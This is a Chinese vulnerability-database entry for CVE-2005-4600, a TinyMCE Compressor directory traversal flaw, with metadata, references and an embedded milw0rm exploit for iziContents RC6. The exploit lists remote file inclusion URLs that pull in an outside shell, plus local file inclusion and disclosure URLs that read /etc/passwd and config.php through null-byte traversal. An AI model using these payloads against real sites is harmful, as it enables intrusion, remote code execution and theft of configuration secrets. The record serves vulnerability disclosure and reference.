TinyMCE Compressor多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113670 漏洞类型 路径遍历
发布时间 2007-09-21 更新时间 2007-09-21
CVE编号 CVE-2005-4600 CNNVD-ID CNNVD-200512-640
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/4441
https://cxsecurity.com/issue/WLB-2005120082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-640
|漏洞详情
TinyMCECompressorPHP的1.06之前版本中的tiny_mce_gzip.php使得远程攻击者可以通过在(1)主题,(2)语言,(3)插件或(4)lang参数中的结尾空字节(%00)读取或包含任意文件。
|漏洞EXP
#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities          #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.izicontents.com/download/iziContents1RC6.zip                    #
#                                                                              #
# greetz: cOndemned, kacper ;>                                                 #


# remote file inclusion:
 http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
 http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]? 
 
# local file inclusion:
 http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
 http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00
 
# remote file disclosure:
 http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00

# milw0rm.com [2007-09-21]
|参考资料

来源:BID
名称:16083
链接:http://www.securityfocus.com/bid/16083
来源:tinymce.moxiecode.com
链接:http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2233
来源:SECUNIA
名称:18262
链接:http://secunia.com/advisories/18262
来源:XF
名称:izicontents-tinymcegzip-directory-traversal(36736)
链接:http://xforce.iss.net/xforce/xfdb/36736
来源:BUGTRAQ
名称:20051229Advisory26/2005:TinyMCECompressorVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/420543/100/0/threaded
来源:OSVDB
名称:22116
链接:http://www.osvdb.org/22116
来源:MILW0RM
名称:4441
链接:http://www.milw0rm.com/exploits/4441
来源:MISC
链接:http://www.hardened-php.net/advisory_262005.111.html
来源:tinymce.moxiecode.com
链接:http://tinymce.moxiecode.com/punbb/viewtopic.php?id=2244
来源:SECTRACK
名称:1015424
链接:http://securitytracker.com/id?1015424
来源:SREASON
名称:306
链接:http://securityreason.com/securityalert/306